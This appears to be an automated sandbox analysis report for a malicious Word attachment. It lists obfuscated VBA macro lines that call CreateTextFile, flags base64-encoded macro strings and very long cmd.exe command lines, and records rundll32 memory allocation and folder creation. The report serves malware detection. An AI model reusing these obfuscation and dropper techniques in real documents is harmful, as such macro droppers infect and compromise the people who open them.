Source: MAIL-0573188.doc	OLE, VBA macro line: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")	Name: Hrs2a1p95u19
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")	Name: Hrs2a1p95u19

Document contains an embedded VBA with base64 encoded strings

Show sources

Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String uTtCAFwHpCGF
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String lwWhZGEasjsS
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String MiCjaGqJfPrI
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String KqVyuQQfwTWh
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String mehEFPFHcklgJDDx
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String wypNISsWSXthFJCq
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String LvnHAGHfIhRDBRAF
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NeiIGCNWgICn
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NisSEYrcDlKQUITa
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String nJJzFRjEWpRikxCD
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String oLweAMoGsqVE

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 5709
Source: unknown	Process created: Commandline size = 5613
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5613	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Shuwftk\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000976F	7_2_1000976F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021B41F	7_2_0021B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00212C63	7_2_00212C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00223895	7_2_00223895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021C0C6	7_2_0021C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021EE78	7_2_0021EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021568E	7_2_0021568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002202C3	7_2_002202C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002242DA	7_2_002242DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218736	7_2_00218736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00217B63	7_2_00217B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00224B41	7_2_00224B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022340A	7_2_0022340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022687F	7_2_0022687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021F444	7_2_0021F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E05A	7_2_0021E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022A0AF	7_2_0022A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002160B9	7_2_002160B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002180BA	7_2_002180BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002148BD	7_2_002148BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022889D	7_2_0022889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002188E5	7_2_002188E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00211CFA	7_2_00211CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002220C5	7_2_002220C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00220D33	7_2_00220D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021F536	7_2_0021F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021153C	7_2_0021153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00227D03	7_2_00227D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021B112	7_2_0021B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022511B	7_2_0022511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00228D1C	7_2_00228D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00225D1D	7_2_00225D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002169A0	7_2_002169A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002261B8	7_2_002261B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00226DB9	7_2_00226DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00229586	7_2_00229586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021F98C	7_2_0021F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00217998	7_2_00217998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00216D9F	7_2_00216D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002231E2	7_2_002231E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002271EF	7_2_002271EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00212A30	7_2_00212A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00214A35	7_2_00214A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00219A37	7_2_00219A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00227A0F	7_2_00227A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00225A61	7_2_00225A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021EA4C	7_2_0021EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002162A3	7_2_002162A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00211280	7_2_00211280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002212E2	7_2_002212E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002226F5	7_2_002226F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002196CD	7_2_002196CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00228ADC	7_2_00228ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021BB3A	7_2_0021BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00220F0C	7_2_00220F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00222B16	7_2_00222B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00227F1F	7_2_00227F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021C769	7_2_0021C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00220B68	7_2_00220B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00221773	7_2_00221773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E377	7_2_0021E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00215B79	7_2_00215B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218F78	7_2_00218F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00229B45	7_2_00229B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00222349	7_2_00222349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00228F49	7_2_00228F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00216754	7_2_00216754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021B75F	7_2_0021B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002117AC	7_2_002117AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002273AC	7_2_002273AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022878F	7_2_0022878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021839D	7_2_0021839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00223FE7	7_2_00223FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021D7EB	7_2_0021D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002267E9	7_2_002267E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002263C1	7_2_002263C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00221BDF	7_2_00221BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00219FDC	7_2_00219FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032B41F	8_2_0032B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032EE78	8_2_0032EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00322C63	8_2_00322C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00333895	8_2_00333895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032568E	8_2_0032568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003342DA	8_2_003342DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003302C3	8_2_003302C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032C0C6	8_2_0032C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00328736	8_2_00328736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00327B63	8_2_00327B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00334B41	8_2_00334B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003363C1	8_2_003363C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00322A30	8_2_00322A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00329A37	8_2_00329A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00324A35	8_2_00324A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033340A	8_2_0033340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00337A0F	8_2_00337A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033687F	8_2_0033687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00335A61	8_2_00335A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032E05A	8_2_0032E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032F444	8_2_0032F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032EA4C	8_2_0032EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003280BA	8_2_003280BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003260B9	8_2_003260B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003248BD	8_2_003248BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003262A3	8_2_003262A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033A0AF	8_2_0033A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033889D	8_2_0033889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00321280	8_2_00321280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003326F5	8_2_003326F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00321CFA	8_2_00321CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003312E2	8_2_003312E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003288E5	8_2_003288E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00338ADC	8_2_00338ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003320C5	8_2_003320C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003296CD	8_2_003296CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00330D33	8_2_00330D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032F536	8_2_0032F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032BB3A	8_2_0032BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032153C	8_2_0032153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032B112	8_2_0032B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00332B16	8_2_00332B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033511B	8_2_0033511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00337F1F	8_2_00337F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00335D1D	8_2_00335D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00338D1C	8_2_00338D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00337D03	8_2_00337D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00330F0C	8_2_00330F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00331773	8_2_00331773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032E377	8_2_0032E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00328F78	8_2_00328F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00325B79	8_2_00325B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032C769	8_2_0032C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00330B68	8_2_00330B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00326754	8_2_00326754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032B75F	8_2_0032B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00339B45	8_2_00339B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00332349	8_2_00332349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00338F49	8_2_00338F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00336DB9	8_2_00336DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003361B8	8_2_003361B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003269A0	8_2_003269A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003217AC	8_2_003217AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003373AC	8_2_003373AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00327998	8_2_00327998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00326D9F	8_2_00326D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032839D	8_2_0032839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00339586	8_2_00339586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033878F	8_2_0033878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032F98C	8_2_0032F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003331E2	8_2_003331E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00333FE7	8_2_00333FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032D7EB	8_2_0032D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003367E9	8_2_003367E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003371EF	8_2_003371EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00331BDF	8_2_00331BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00329FDC	8_2_00329FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FB41F	9_2_001FB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FEE78	9_2_001FEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F2C63	9_2_001F2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F568E	9_2_001F568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00203895	9_2_00203895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FC0C6	9_2_001FC0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002002C3	9_2_002002C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002042DA	9_2_002042DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F8736	9_2_001F8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00204B41	9_2_00204B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F7B63	9_2_001F7B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002063C1	9_2_002063C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F9A37	9_2_001F9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0020340A	9_2_0020340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F4A35	9_2_001F4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F2A30	9_2_001F2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00207A0F	9_2_00207A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00205A61	9_2_00205A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FE05A	9_2_001FE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FEA4C	9_2_001FEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FF444	9_2_001FF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0020687F	9_2_0020687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0020A0AF	9_2_0020A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F1280	9_2_001F1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F48BD	9_2_001F48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F80BA	9_2_001F80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F60B9	9_2_001F60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F62A3	9_2_001F62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0020889D	9_2_0020889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002012E2	9_2_002012E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F96CD	9_2_001F96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002026F5	9_2_002026F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F1CFA	9_2_001F1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002020C5	9_2_002020C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F88E5	9_2_001F88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00208ADC	9_2_00208ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FB112	9_2_001FB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00200D33	9_2_00200D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F153C	9_2_001F153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00207D03	9_2_00207D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FBB3A	9_2_001FBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FF536	9_2_001FF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00200F0C	9_2_00200F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00202B16	9_2_00202B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0020511B	9_2_0020511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00208D1C	9_2_00208D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00205D1D	9_2_00205D1D
